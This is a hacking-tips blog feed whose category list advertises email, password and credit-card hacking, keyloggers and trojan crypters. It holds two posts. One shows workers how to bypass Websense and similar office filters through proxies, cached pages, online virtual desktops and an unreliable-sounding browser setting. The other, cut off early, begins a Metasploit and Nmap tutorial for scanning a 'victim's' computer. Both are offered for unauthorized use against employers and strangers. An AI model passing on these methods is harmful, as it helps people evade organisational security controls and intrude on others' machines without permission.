<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1848613746302332574</id><updated>2025-08-25T09:56:06.632-07:00</updated><category term="Articles"/><category term="How-To Guides"/><category term="Password Hacking"/><category term="Email Hacking"/><category term="Hacks"/><category term="Virus Creation"/><category term="Hacking Softwares"/><category term="Keylogging"/><category term="Phishing"/><category term="Network Hacks"/><category term="Remote Hacking"/><category term="Email Security"/><category term="Windows"/><category term="Internet"/><category term="Windows XP"/><category term="Windows Vista"/><category term="Windows 7"/><category term="Hacking Tutorials"/><category term="Hacks How-To Guides"/><category term="keylogger"/><category term="Software Reviews"/><category term="learn hacking - for beginners"/><category term="Internet Security"/><category term="Mobile Hacks"/><category term="PC Security"/><category term="Binder"/><category term="Crypter"/><category term="FAQs"/><category term="Facebook Hacking"/><category term="Top 10 Reviews"/><category term="Hack Wifi"/><category term="Wifi Security"/><category term="Wifi hacks"/><category term="YouTube Hacks"/><category term="Facebook Hacks"/><category term="Social Engineering"/><category term="Msn Hacks"/><category term="Products"/><category term="Speed Up PC"/><category term="Cookies Stealing"/><category term="Wifi Hacking Tutorials"/><category term="AWESOME HIDDEN SECRETS IN PC"/><category term="Camtasia"/><category term="Camtasia 7 download"/><category term="Camtasia 7 key"/><category term="Camtasia Studio"/><category term="Camtasia key"/><category term="Download without surveys"/><category term="Free Stuff"/><category term="Free download"/><category term="Get a Free Camtasia Studio 7 Keygen"/><category term="How to Activate GodMode In Windows 7 And Vista"/><category term="How to Earn Great Money with myLot"/><category term="RapidShare Hacks"/><category term="cookie logger"/><category term="cookies stealing tutorial"/><category term="download hacks"/><category term="hacking sharecash"/><category term="how firewall works"/><category term="sharecash downloader"/><category term="sharecash downloader without surveys"/><category term="sharecash hacks"/><category term="000 Students Remotely Access Their School"/><category term="2024 Mobile Games Mega Pack [240x320]"/><category term="25 Most INTERESTING Computer Facts"/><category term="25 Ways To Generate Web Site Traffic"/><category term="4 Websites To Send Anonymous SMS Without Registration"/><category term="4 ways on How to Trick facebook password"/><category term="4G Technology"/><category term="7 Coolest Tricks for Firefox Browser"/><category term="A History of VoIP"/><category term="A small trick in cmd"/><category term="A to Z Run Commands - Useful commands"/><category term="Accelerate Downloading Speed up to 10 Times Faster with BitComet"/><category term="Access Your Folders as Drives"/><category term="Account Approval Trick Of Google Adsense"/><category term="Add Folder To SEND TO"/><category term="Additional clocks in taskbar using windows vista - Cool Vista Trick"/><category term="Adsense Alternative Websites"/><category term="Advance Reading Technology (ART)"/><category term="Agloco"/><category term="Agloco Banners Get Paid Cash To Surf The Web"/><category term="All You Wanted to Know About Proxies"/><category term="Almost Every file format in the world"/><category term="An Introduction To Keyloggers"/><category term="Anonymous Mailer Software to Gmail"/><category term="Another Pay Per Click Website 100% Real"/><category term="Apple iPad Review"/><category term="Apple to launch its TV by 2012"/><category term="Ardamax Keylogger"/><category term="Auto Shutdown Your Computer After A Given Amount Of Time"/><category term="Automatically close the non-responding program"/><category term="BIOS BACK DOOR PASSWORDS"/><category term="Backtrack 5 Tutorial"/><category term="Backup your Gmail account"/><category term="Basic Internet Security Terminologies for Beginners"/><category term="Best Way Of Making Money"/><category term="Big Money PTC (Also Pay Per Click)"/><category term="Block Website"/><category term="Boost download speed in LAN internet"/><category term="Bypass BIOS Password"/><category term="Bypass Bios Login"/><category term="Bypassing Facebook Security"/><category term="Change Your Ip In Less Then 1 Minute"/><category term="Check Whether Your PC is Male or Female"/><category term="Cloud Computing and Security Issues"/><category term="Compare Google and Yahoo server speed"/><category term="Computer Hacks"/><category term="Computer prank to Pop out cdtray continuously"/><category term="Control Your PC Through Your Voice"/><category term="Cookies"/><category term="Cool Mobile Wallpapers 240x320"/><category term="Deadly Virus Prank to Freak Out Your Friends"/><category term="Delete viruses from pendrives using CMD"/><category term="Different USB Technology"/><category term="Disable the Send an error report to Microsoft message"/><category term="Display legal notice on startup"/><category term="Dollar GPT(Pay 10 Dollar Per Click)"/><category term="Download Free Video Converter for Windows"/><category term="Download Full Version Uniblue SpeedUpMyPC 2011 with Serial License Key"/><category term="Download Norton 360 Version 4.0 2011 For Free"/><category term="Download Unlimited Rapidshare Files Directly For Free"/><category term="Earn Money Real Paying Website"/><category term="Easy Hacking Tutorials and Tools"/><category term="Edit Any Web Page in your Browser Just Like a Wiki"/><category term="Enabling Task Manager"/><category term="Everything You wanted to know about FIREWALLS"/><category term="FAQ: What is Binder and How to Use It for Hacking?"/><category term="FAQ: What is FUD Crypter? - Hide Trojans"/><category term="FTP tutorial"/><category term="Facebook"/><category term="Facebook - the Complete Biography"/><category term="Facebook Status symbols"/><category term="Facebook Theme"/><category term="Facebook Virus Prank - Making fun to your friend"/><category term="Facts About Bill Gates"/><category term="File sharing over the WAN - Storage Networking"/><category term="Flash DRIVE"/><category term="Free 100% FUD Crypter to Hack Hotmail"/><category term="Free Calling Websites Through Internet"/><category term="Free Hotfile Premium Account That Works"/><category term="Free WinRar Password Recovery"/><category term="Free internet through your Nokia Mobile"/><category term="Get CyberGhost VPN Premium for Free"/><category term="Get Free Domain Throuh Freebie Bombards"/><category term="Get a Free Activation Key for Eset Nod32"/><category term="Get a Free Serial Key for AVG Antivirus Professional"/><category term="Get a Free Serial Key for Auslogics BoostSpeed"/><category term="Get a Free Serial License Key for SpeedUpMyPC 2011"/><category term="GoZilla free"/><category term="Google Adsense Tips"/><category term="Google adds graphing calculator to search results"/><category term="Great Social Engineering Techniques"/><category term="Hack Any System Bios"/><category term="Hack Website"/><category term="Hidden Bluetooth service in XP and Vista"/><category term="Hide Files in Image Files"/><category term="Hide Hard drive&#39;s partition by using command Prompt - without any software"/><category term="Hotmail and Yahoo Passwords"/><category term="How Long Has Your System Been Running?"/><category term="How To Block A Website"/><category term="How To Change Facebook Theme"/><category term="How To Change Your Processor Speed"/><category term="How To Find Hidden Web Pages"/><category term="How To Login in Windows XP After Password Forgot"/><category term="How To Lower Someone&#39;s YouTube Subscription Count"/><category term="How To Make Free Phone Calls"/><category term="How To Make Money With AlertPay"/><category term="How To Make My Face And Skin White"/><category term="How To Recover Deleted Files"/><category term="How To Recover Your Computer After Virus Attack"/><category term="How To Send Anonymous Emails - For Free"/><category term="How To Send a Self Deleting SMS"/><category term="How To Speed Up Your Internet"/><category term="How To Trace and Spy Your Girlfriends Mobile Phone Live for Free"/><category term="How To Trick Into Computers Through WiFi"/><category term="How To Trick Skype Account Passwords"/><category term="How To Trick Your School Network"/><category term="How To Trick eBay User ID and Password"/><category term="How To Turn Your Mobile Phone into a Web Server"/><category term="How To Use Gmail as a Virtual Hard Drive"/><category term="How does Rapidshare work?"/><category term="How hard disc works?"/><category term="How mouse works?"/><category term="How to (Flip) Upside Down Facebook Status Update"/><category term="How to Check if Your Computer is Infected or Not"/><category term="How to Connect Two Computers to One Broadband Modem to Use the Internet"/><category term="How to Copy X-Box games"/><category term="How to Create Your Own Customized Run Commands"/><category term="How to Create a Computer Virus"/><category term="How to Create a Fake and Harmless Virus"/><category term="How to Detect Fake Emails"/><category term="How to Enable Right Click in Websites"/><category term="How to Fix Explorer EXE - Application Error?"/><category term="How to Format USB Drive with NTFS File System"/><category term="How to Hack AIM Account Password"/><category term="How to Hack a Credit Card"/><category term="How to List an eBay Auction for Maximum Profit"/><category term="How to Make Money Online eBooks"/><category term="How to Make a Bootable Antivirus Cd"/><category term="How to Play Hidden Snake Game on Youtube"/><category term="How to Remove Facebook Timeline"/><category term="How to Send Anonymous Email"/><category term="How to Spy on a Webcam"/><category term="How to Trace an Email Address Using Header"/><category term="How to Track Your Stolen Laptop"/><category term="How to Trick Graboid to Get Unlimited Movies for Free"/><category term="How to Trick Someones IP Address"/><category term="How to Uninstall and Remove Software in Safe Mode in Windows Operating System"/><category term="How to Unlock or Hack memory card when you forgot your memory card password"/><category term="How to Use Google Search Efficiently"/><category term="How to bypass firewall"/><category term="How to recover MOST of scratched CD/DVD data discs"/><category term="IP address hacking"/><category term="Increase Hard Disk speed in Windows 100% SAFE NO SOFTWARE REQUIRED"/><category term="Install windows xp in less than 15 minutes"/><category term="Internet Access Types"/><category term="Invert window screen - Cool keyboard trick"/><category term="KNOW THE DATE N TIME OF INSTALLATION OF YOUR WINDOWS"/><category term="Keyboard Shortcuts For Ubuntu"/><category term="Keylogger for Linux"/><category term="Klang Ultrasonic Speakers Beam Sound Right Where You Want It"/><category term="Know More About Phishing Attacks"/><category term="Learn All About Spyware"/><category term="Learn How To Make Your Own Anonymous Email Service"/><category term="Learn How to Trick Any Email Password"/><category term="Learn how to Trick Gmail account password"/><category term="Linux"/><category term="Listen to live music"/><category term="Live Website Editing"/><category term="Live Website Editor Software"/><category term="Lock Your Computer With USB Flash Drive"/><category term="MAKE YOUR PC TO READ PDF&#39;s"/><category term="MS DOS IN COLOR"/><category term="Make FREE Calls to Landline and Mobile phones"/><category term="Make Firefox run up to 30 times faster"/><category term="Make screen black"/><category term="Master Password For BIOS"/><category term="Medical Benefits of Grapes"/><category term="Metasploit"/><category term="Metasploit Tutorial"/><category term="Microsoft word trick amazing thing"/><category term="Move Mozilla Firefox Automatically- Cool Computer Tricks"/><category term="Mozilla Firefox Breaks World Record"/><category term="Nameless Folder"/><category term="Neopets cheat"/><category term="Network Management Server Management"/><category term="New Technology Now Lets Over 100"/><category term="Nmap"/><category term="Nmap Tutorial"/><category term="Notepad trick/Prank"/><category term="Open Active Folder in Command Prompt"/><category term="Open Links In New TAB"/><category term="Optimize broadband and dsl connections"/><category term="PASSWORD PROTECT YOUR WORD FILES"/><category term="PC hacking"/><category term="Painfull Computer Pranks"/><category term="Password Recovery Tool For Microsoft Operating Systems"/><category term="Password Stealers and Keyloggers From Antiviruses"/><category term="Paypal Account In Pakistan"/><category term="Protect Yourself Against Viruses"/><category term="Quick Neopets Cheats and tricks"/><category term="RATS And Malware"/><category term="RATs and Keyloggers from Antivirus Softwares"/><category term="Rapidshare Time Resetter (unlimited rapidshare)"/><category term="Real Tricking U Didn&#39;t Seen Before"/><category term="Recover Deleted Data Using FreeUndelete Software"/><category term="Recover data from a quick-erased CDRW/DVDRW disc"/><category term="Recover windows XP Administrator Password"/><category term="Remote File Inclusion"/><category term="Reviews"/><category term="SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)"/><category term="SPEEDING XP BY 60 TIMES"/><category term="Samsung Super Thin AMOLED Display Makes Us Look Forward to a Screen-Filled Future"/><category term="Search Engine"/><category term="Setting Up a Small Business Computer Network"/><category term="Shortcut keyboard key in windows xp"/><category term="Shut Up and Be Secure - Power of Social Engineering"/><category term="Simple But Amazing Tricks In PC"/><category term="Spyware and Web Bugs – For Free"/><category term="Switch Mouse Clicks - Cool Computer Prank"/><category term="Task Manager has been Disabled by your Administrator"/><category term="Task manager"/><category term="Team Viewer"/><category term="The 10 Most Memorable Quotes From Steve Jobs"/><category term="The Breif Internet History"/><category term="The Fundamentals of Fiber Optic Cable Management"/><category term="The Future of Dedicated Hosting Delivery"/><category term="The Nanotube Computer"/><category term="The Ultimate Virus - The Best Virus Prank Program Ever"/><category term="Things you must know about Internet"/><category term="Top 5 Free Screen Recorders to Record Your Screen Activities"/><category term="Top Ways to Search Files on Rapidshare"/><category term="Trace Websites"/><category term="Trick MSN Hotmail Account using Reverting"/><category term="Trick To Launch Multiple applications With Lacuna"/><category term="Trick Windows-Specific Services"/><category term="Trick Write “You are a fool” Continuously"/><category term="Tricks"/><category term="Tricks - Try Google Gravity"/><category term="Tricks Google Sphere - Have fun with Google"/><category term="Tricks and Secrets"/><category term="Tricks for Symbians Mobiles"/><category term="Tricks to Change Google logo text"/><category term="Tricks to Restart Windows"/><category term="Try this out on anyone computer"/><category term="Turn Your Desktop Into a Real 3D Multi-Touch Desktop"/><category term="Turning off System Beeps"/><category term="Twitter Hacks"/><category term="USB"/><category term="USB Device Generic volume cannot be stopped right now"/><category term="Ufone Networks Tricks"/><category term="Unblock Websense"/><category term="Understand The Beep"/><category term="Unlock BIOS"/><category term="Verify Paypal"/><category term="Verify Paypal Account In Pakistan"/><category term="View Hidden files With Google"/><category term="Virtual Private Network (VPN) Technology"/><category term="Visual Basic Undetecting Tool to Hide Trojans"/><category term="Watch Live TV on Your PC For Free"/><category term="Watch Star Wars In command Prompt"/><category term="Web Hosting"/><category term="Website Security"/><category term="Website Tutorial"/><category term="What is Double Password?"/><category term="What is Home Wireless Networking?"/><category term="What is a Peer To Peer Network?"/><category term="Who Used Your Pc In Your Absence"/><category term="Why Firewall Security is Necessary to Protect your Network"/><category term="Why the Domain Yahoo is so Popular"/><category term="Wifi Hack AIO"/><category term="Win Prizes and Cash"/><category term="Windows 7 Tips"/><category term="Windows Windows 7"/><category term="Yahoo Account Hacking / Hack yahoo Account by Cookies stealing to browser / Session Hijacking"/><category term="Yahoo and Gmail Accounts"/><category term="You can Change The Recycle Bin&#39;s Name"/><category term="account freeser packs"/><category term="affordable web design"/><category term="and Secrets"/><category term="approval tips for adsense"/><category term="approval trick for adsense"/><category term="bypass cyberoam"/><category term="bypass firewall"/><category term="configuring a website"/><category term="create free flash website"/><category term="create your own web design"/><category term="desktop pc"/><category term="download"/><category term="download free"/><category term="earn money online"/><category term="email account hacking"/><category term="firewall tutorial"/><category term="free Grab the Gator"/><category term="free WebZIP"/><category term="free lotto"/><category term="free money online"/><category term="free mp3 downloads"/><category term="free music downloads"/><category term="free neopets hack"/><category term="free neopets point"/><category term="free pc downloads"/><category term="free prizes"/><category term="free screensavers"/><category term="free software"/><category term="free software download"/><category term="free walpapers"/><category term="free win"/><category term="freebies"/><category term="game cheat"/><category term="hack a website"/><category term="hack adsense"/><category term="hack computer using ip address"/><category term="hack cyberoam"/><category term="hack firewall"/><category term="hacking a router"/><category term="hacking email account"/><category term="hacking web servers"/><category term="hotmail hacks"/><category term="how to hack website"/><category term="how to use somone&#39;s IP address"/><category term="latest mobiles 2011"/><category term="live account freezer"/><category term="neopets point hack"/><category term="new mobiles"/><category term="new technology 2011"/><category term="online money"/><category term="paid to surf online"/><category term="pc"/><category term="pc computer"/><category term="pc desktop"/><category term="pc software"/><category term="phones in the future"/><category term="router hacks"/><category term="speech recognition voice"/><category term="sport and news"/><category term="tips for adsense"/><category term="trick for adsense"/><category term="voice speech recognition"/><category term="ways to earn money online"/><category term="website hacks"/><category term="what Did He Do?"/><category term="win cash"/><category term="win free"/><category term="win free online cash"/><category term="win free online prizes"/><category term="win prizes"/><category term="yahoo account hacks"/><category term="yahoo mail hacking"/><title type='text'>Hacking Tutorial And Tips</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>728</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-697162217555243837</id><published>2013-01-05T05:59:00.000-08:00</published><updated>2013-07-28T00:20:44.216-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Unblock Websense"/><title type='text'>How To Hack or Unblock Websense To Access Website</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
Hey Friends Welcome Back , &amp;nbsp;In previous post i have shared about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/how-to-hack-victims-computer-with-nmap.html&quot;&gt;How to hack victim&#39;s computer using NMAP&lt;/a&gt;. Today I am going to share a tutorial on ” How to Unblock or Hack or 
Bypass Websense to Access sites in Office or College”.&lt;br /&gt;
&lt;b&gt;Note:&lt;/b&gt; The 
techniques are also applicable to bypass or hack any firewall like 
Cyberoam etc. As we know , Most offices has Websense Firewall to 
restrict the access to various websites. Sometimes this frustrates users
 as they are not being able to browse things freely.So Guys Read On..&lt;/div&gt;
&lt;div&gt;
First
 of all I would like to provide basic information about Websense. How it
 works and restricts users to access web freely.Websense blocks the 
website on basis of two things :&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;1. Category:&amp;nbsp;&lt;/strong&gt;Websense
 divides all the Websites over the internet in some categories like 
commercial, Business, Entertainment etc. Websense blocks the particular 
category completely means all websites of that categories are blocked.&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;2. Based on Meta Keyword :&lt;/strong&gt;&amp;nbsp;Websense
 regularly identifies certain keywords and add them to its database of 
blocked keywords. Now if any of these keyword is included in the Website
 TITLE or URL then it will be automatically blocked.&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;TECHNIQUES TO BYPASS OR UNBLOCK OR HACK WEBSENSE&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;1. Cached Copy Hack&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
Note:
 This hack doesn’t work on Websites blocked by second Websense 
Technology. But all the websites blocked by first category can be easily
 accessed.&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;
&lt;ins style=&quot;border-bottom-style: none; border-bottom-width: medium; border-color: initial; border-left-style: none; border-left-width: medium; border-right-style: none; border-right-width: medium; border-top-style: none; border-top-width: medium; display: inline-table; height: 60px; margin-bottom: 0pt; margin-left: 0pt; margin-right: 0pt; margin-top: 0pt; padding-bottom: 0pt; padding-left: 0pt; padding-right: 0pt; padding-top: 0pt; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;/ins&gt;&lt;br /&gt;
&lt;ins id=&quot;aswift_0_anchor&quot; style=&quot;border-bottom-style: none; border-bottom-width: medium; border-color: initial; border-left-style: none; border-left-width: medium; border-right-style: none; border-right-width: medium; border-top-style: none; border-top-width: medium; display: block; height: 60px; margin-bottom: 0pt; margin-left: 0pt; margin-right: 0pt; margin-top: 0pt; padding-bottom: 0pt; padding-left: 0pt; padding-right: 0pt; padding-top: 0pt; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;
&lt;div&gt;
When
 you search anything using&amp;nbsp;Google&amp;nbsp;In the each search result there are 
two things in blue color prior to URL i.e Cached and Similar. To view 
that blocked Website You have to click on Cached.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Most Websites 
can be opened using this Technique but some websites require some more 
efforts. You have to do some more ting like you have to remove certain 
codes from the Cached URL.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Hope this will help you to access almost all blocked websites except social networking one’s.&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;2. Finding a Good Proxy&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
You
 can also bypass Websense using several proxy sites. Note: Most of the 
proxy sites will be blocked after one or two days. So you have to search
 for proxies regularly. But&amp;nbsp; I have an easy method to find proxies..&lt;/div&gt;
&lt;div&gt;
you have to use the cached copy hack to find the daily proxy websites…&lt;/div&gt;
&lt;div&gt;
Method to Find Proxy:&lt;/div&gt;
&lt;div&gt;
Open
 the Google and In search Query column type “tech-faq Proxy” without 
quotes. Now open the Cached copy of the website. Here you will find 
daily new proxy list now you have to copy the proxy URL’s and check for 
working Proxies.&lt;/div&gt;
&lt;div&gt;
Now using proxy you can unblock any Website but I will advice don’t open Social Networking sites and Emails using these.&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;3. Using Cloud Computing (Virtual Operating System)&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
For
 Opening Gmail , gtalk, Yahoo,&amp;nbsp;Hotmail&amp;nbsp;means all email clients you can use 
virtual operating system. For this you have to register on cloud 
computing website. After that you will get Virtual computer online which
 you can use anywhere in the world just you need a internet connection.&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;
&lt;ins style=&quot;border-bottom-style: none; border-bottom-width: medium; border-color: initial; border-left-style: none; border-left-width: medium; border-right-style: none; border-right-width: medium; border-top-style: none; border-top-width: medium; display: inline-table; height: 60px; margin-bottom: 0pt; margin-left: 0pt; margin-right: 0pt; margin-top: 0pt; padding-bottom: 0pt; padding-left: 0pt; padding-right: 0pt; padding-top: 0pt; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;/ins&gt;&lt;br /&gt;
&lt;ins id=&quot;aswift_1_anchor&quot; style=&quot;border-bottom-style: none; border-bottom-width: medium; border-color: initial; border-left-style: none; border-left-width: medium; border-right-style: none; border-right-width: medium; border-top-style: none; border-top-width: medium; display: block; height: 60px; margin-bottom: 0pt; margin-left: 0pt; margin-right: 0pt; margin-top: 0pt; padding-bottom: 0pt; padding-left: 0pt; padding-right: 0pt; padding-top: 0pt; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;
&lt;div&gt;
Some Virtual Operating Websites are:&lt;/div&gt;
&lt;div&gt;
1.&amp;nbsp;&lt;a href=&quot;http://www.icloud.com/&quot; style=&quot;color: #1d81b6; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot;&gt;www.icloud.com&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
2.&amp;nbsp;&lt;a href=&quot;http://www.startforce.com/os/&quot; style=&quot;color: #1d81b6; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot;&gt;www.startforce.com/os/&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;4. Bypass or Unblock Downloading RESTRICTION&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
In
 most corporate offices you have download restrictions. I will tell you 
the basic simple method to bypass all downloading restrictions. Just 
follow the following instructions.&lt;/div&gt;
&lt;div&gt;
Open
 the Internet Explorer then go to Tools then to Internet Options and 
Then Click on Security Tab. Now Click on internet Icon and then on 
default level and then click on Local Internet and then again on default
 level and then on Trusted Sites and Again on default level then click 
On apply.&lt;/div&gt;
&lt;div&gt;
Now you will be able to download anything without any restriction. Enjoy happy downloading…&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/697162217555243837/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-hack-or-unblock-websense-to.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/697162217555243837'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/697162217555243837'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-hack-or-unblock-websense-to.html' title='How To Hack or Unblock Websense To Access Website'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-9080862637620393231</id><published>2013-01-05T05:58:00.002-08:00</published><updated>2013-07-28T00:22:27.023-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit Tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Nmap"/><category scheme="http://www.blogger.com/atom/ns#" term="Nmap Tutorial"/><title type='text'>How To Hack Victim&#39;s Computer With Nmap And Metasploit</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Today I am writing a tutorial on hacking with Nmap with Metasploit. First d/l Metasploit&amp;nbsp; from the official website,Link:&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;bbcode_container&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;bbcode_description&quot;&gt;
&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt;
&lt;pre class=&quot;bbcode_code&quot; style=&quot;height: 36px;&quot;&gt;&lt;a href=&quot;http://www.metasploit.com/&quot; style=&quot;color: #1d81b6; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;http://www.metasploit.com/&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&amp;nbsp;&lt;/pre&gt;
&lt;pre class=&quot;bbcode_code&quot; style=&quot;height: 36px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;Let  all that install, and towards the end of the installation it will ask if you would like Nmap installed&lt;/b&gt;&lt;b&gt; also,&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/pre&gt;
&lt;pre class=&quot;bbcode_code&quot; style=&quot;height: 36px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;choose yes. Once you have that installed the&amp;nbsp; Metasploit screen will&amp;nbsp; open up as shown below...&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;319&quot; src=&quot;http://i205.photobucket.com/albums/bb181/1-VIP-/1-2.jpg&quot; style=&quot;border-bottom-color: rgb(212, 215, 222); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(212, 215, 222); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(212, 215, 222); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(212, 215, 222); border-top-style: solid; border-top-width: 1px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
Now type db_create&lt;br /&gt;
&lt;br /&gt;
Once you have typed that type nmap&lt;br /&gt;
&lt;br /&gt;
This loads nmap, as shown below....&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;319&quot; src=&quot;http://i205.photobucket.com/albums/bb181/1-VIP-/11.gif&quot; style=&quot;border-bottom-color: rgb(212, 215, 222); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(212, 215, 222); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(212, 215, 222); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(212, 215, 222); border-top-style: solid; border-top-width: 1px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
You need to configure your scan now, I usually do a simple -sT -sV scan 
which will tell us the open ports and services running on the victims 
computer, Now type nmap -sT -sV xxx.xxx.xxx.x (X&#39;s being victims Ip 
number), Demonstrated below.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;319&quot; src=&quot;http://i205.photobucket.com/albums/bb181/1-VIP-/11-1.gif&quot; style=&quot;border-bottom-color: rgb(212, 215, 222); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(212, 215, 222); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(212, 215, 222); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(212, 215, 222); border-top-style: solid; border-top-width: 1px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
Now give it 5 minutes to complete the scan,Once that is complete if your lucky you should get a response like this...&lt;br /&gt;
&lt;br /&gt;
